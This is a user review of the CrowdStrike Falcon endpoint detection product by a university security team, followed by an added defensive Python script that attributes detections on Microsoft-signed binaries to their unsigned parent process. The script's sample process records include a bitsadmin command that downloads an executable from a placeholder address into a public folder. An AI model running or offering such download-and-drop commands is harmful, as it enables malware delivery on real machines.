A Comprehensive Look at the Fabulous EDR CrowdStrike Falcon
March 19, 2024

Humayoon Khan | TrustRadius Reviewer
Score 10 out of 10
Vetted Review
Verified User

Software Version

Falcon Enterprise

Modules Used

  • Falcon Insight
  • Falcon Sandbox
  • Falcon Prevent
  • Falcon Intelligence
  • Falcon Search Engine

Overall Satisfaction with CrowdStrike Falcon

I use CrowdStrike Falcon as the main source of monitoring for threats originating from the operating systems used by our servers, workstations, staff laptops and guest users' machines.
Our organization being a university, where thousands of students and hundreds of staff turn up daily, puts our critical assets at risk of being compromised by an insider. CrowdStrike Falcon helps us identify the source of a threat accurately and blocks the triggering file or script before it can cause damage. The AI / ML based detections are very helpful because they catch threats that other vendors may fail at. The scope of our use case is endpoint monitoring and threat management.

Pros

  • AI / ML based malicious activity detections
  • Detection information presented clearly and concisely on the dashboard
  • Easy filtering of detections on hostname, detection name, severity, date, time, hash, technique, etc.
  • Traces the full process chain instead of just showing the source file or script, which really helps in tracing the main security concern on a machine

Cons

  • If some malicious app uses a Microsoft-signed binary like OneDrive, cmd or wscript, CrowdStrike would tag the Microsoft binary as malicious and fail to provide the actual file that tried to execute these. For example, if malware.exe tries to run the command "cmd /c bitsadmin", CrowdStrike would tag cmd or bitsadmin as malicious and sometimes does not mention malware.exe at all.
  • There are two different dashboards (updated and deprecated), which causes confusion among my team; everyone must be on the same page and use a single dashboard.
  • Support is very slow in responding to problems and depends on automated bots, which is really frustrating when a major issue arises.

Return on Investment

  • Made our organization more secure by ensuring threats are blocked instantly and tagged clearly for us to take action
  • Increased confidence in our security after recent data leaks
  • Business increased after clients were assured that their data protection and security is top notch
Our users frequently installed cracked software and torrents; since CrowdStrike Falcon this has been completely eliminated, because most of these are backdoored and malicious, so CrowdStrike Falcon would not let them install or even download these. We also made use of the exclusion module to exclude some machines from detections, like our programming labs, where students learn to code and may need to download code or programs which may not always pass CrowdStrike. Most of these exclusions are hash based.
We have been able to successfully reduce our attack surface: in the first 90 days after installation we had several thousand detections; now that has been reduced to 900-1000.
It offers scalability: as a university we grow each year as more students enroll and we require more staff, and as our needs grow and evolve, Falcon grows with us. The process is also very simple: just generate an agent for the target operating system and install it. This has helped us a lot to achieve our goal of giving quality education to students.
  • We integrated Falcon with our SIEM solution temporarily
  • Implemented / enforced a partial information security policy through Falcon
  • Detected C2 in our internal network by using the Threat Actors library in CrowdStrike, where they give information about the most dangerous hacking groups
It was the easiest to deploy and manage, while the dashboard was also very clear and precise in terms of useful information.
Another major reason for selecting CrowdStrike Falcon was its AI and ML detection capabilities, which really impressed us during evaluation. The other tools analysed were not too bad either but seemed complex to operate and use.

Do you think CrowdStrike Falcon delivers good value for the price?

Yes

Are you happy with CrowdStrike Falcon's feature set?

Yes

Did CrowdStrike Falcon live up to sales and marketing promises?

Yes

Did implementation of CrowdStrike Falcon go as expected?

Yes

Would you buy CrowdStrike Falcon again?

Yes

It is best suited for organizations that have a lot of machines and users, since CrowdStrike's agent-based deployment is easy to manage and maintain.
CrowdStrike Falcon may be less appropriate for smaller organizations due to its cost; also, a technical support team is required to install / remove agents from machines and monitor the dashboard for detections daily.

CrowdStrike Falcon Feature Ratings

Anti-Exploit Technology: 6
Endpoint Detection and Response (EDR): 10
Centralized Management: 10
Infection Remediation: 5
Malware Detection: 10
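The reviewer's main complaint in the Cons section is attribution: a detection on a Microsoft-signed living-off-the-land binary (cmd, bitsadmin, wscript, OneDrive) is reported on that binary rather than on the unsigned malware that spawned it. The script below is an added example, not code from the review, from TrustRadius or from CrowdStrike, showing the triage logic an analyst applies to exported process telemetry: walk the parent chain upward from the detected process and report the nearest ancestor that is not Microsoft-signed. The process records, field names (pid, ppid, image, signer, cmdline) and signer strings are constructed for the example and are not Falcon's event schema; the IP address is from the documentation range. It also handles the two failure modes that matter in practice: a chain where every ancestor is Microsoft-signed (a user double-clicking a script under explorer.exe, where the real artifact is the script path on the command line) and loops caused by PID reuse in the telemetry.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumption: signer strings as they appear in the constructed sample below.
MICROSOFT_SIGNERS = {"Microsoft Windows", "Microsoft Corporation"}


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str             # executable file name
    signer: Optional[str]  # Authenticode signer, None if unsigned
    cmdline: str


# Constructed sample process records (not Falcon telemetry).
# Chain 1 mirrors the review's case: malware.exe -> cmd.exe -> bitsadmin.exe.
# Chain 2 is a user double-clicking a script: explorer.exe -> wscript.exe,
# with no non-Microsoft ancestor at all.
SAMPLE_PROCESSES: List[Proc] = [
    Proc(4, 0, "System", "Microsoft Windows", ""),
    Proc(812, 4, "explorer.exe", "Microsoft Windows", "C:\\Windows\\explorer.exe"),
    Proc(3120, 812, "malware.exe", None,
         "C:\\Users\\student\\Downloads\\setup_crack\\malware.exe"),
    Proc(3144, 3120, "cmd.exe", "Microsoft Windows",
         "cmd /c bitsadmin /transfer j /download /priority high "
         "http://203.0.113.7/p.exe C:\\Users\\Public\\p.exe"),
    Proc(3160, 3144, "bitsadmin.exe", "Microsoft Windows",
         "bitsadmin /transfer j /download /priority high "
         "http://203.0.113.7/p.exe C:\\Users\\Public\\p.exe"),
    Proc(3300, 812, "wscript.exe", "Microsoft Windows",
         "wscript.exe C:\\Users\\student\\Desktop\\invoice.js"),
]


def build_index(procs: List[Proc]) -> Dict[int, Proc]:
    """Index process records by PID so parent lookups are O(1)."""
    return {p.pid: p for p in procs}


def ancestry(index: Dict[int, Proc], pid: int) -> List[Proc]:
    """Return the chain from the given process up to the root, self first.

    The visited set guards against loops caused by PID reuse in telemetry,
    where a parent PID has been recycled by one of its own descendants.
    Unknown PIDs (or a parent missing from the export) end the walk.
    """
    chain: List[Proc] = []
    seen = set()
    cur = index.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = index.get(cur.ppid)
    return chain


def is_microsoft_signed(p: Proc) -> bool:
    return p.signer in MICROSOFT_SIGNERS


def first_non_microsoft_ancestor(index: Dict[int, Proc], pid: int) -> Optional[Proc]:
    """Walk upward from a detection on a Microsoft-signed binary and return
    the nearest process (self included) that is NOT Microsoft-signed.

    Returns None when every process up to the root is Microsoft-signed; the
    analyst then has to fall back to the command line (for wscript.exe the
    script path is the real artifact) instead of a parent image.
    """
    for p in ancestry(index, pid):
        if not is_microsoft_signed(p):
            return p
    return None


def explain_detection(index: Dict[int, Proc], pid: int) -> str:
    """Render a one-line attribution for the analyst."""
    chain = ancestry(index, pid)
    if not chain:
        return f"pid {pid}: no process record"
    origin = first_non_microsoft_ancestor(index, pid)
    path = " <- ".join(p.image for p in chain)
    if origin is None:
        return f"{path}; no non-Microsoft ancestor, inspect cmdline: {chain[0].cmdline}"
    return f"{path}; origin: {origin.image} ({origin.cmdline})"


if __name__ == "__main__":
    idx = build_index(SAMPLE_PROCESSES)
    for detected_pid in (3160, 3300, 9999):
        print(explain_detection(idx, detected_pid))
```

Run against the sample, the bitsadmin detection (pid 3160) is attributed to malware.exe two hops up, the wscript detection (pid 3300) reports no non-Microsoft ancestor and points at the .js path on its command line, and an unknown PID yields no record rather than an exception. Stopping at the first non-Microsoft process is a deliberate choice: a signed Microsoft binary in the middle of the chain (the reviewer's OneDrive case) is walked past rather than blamed.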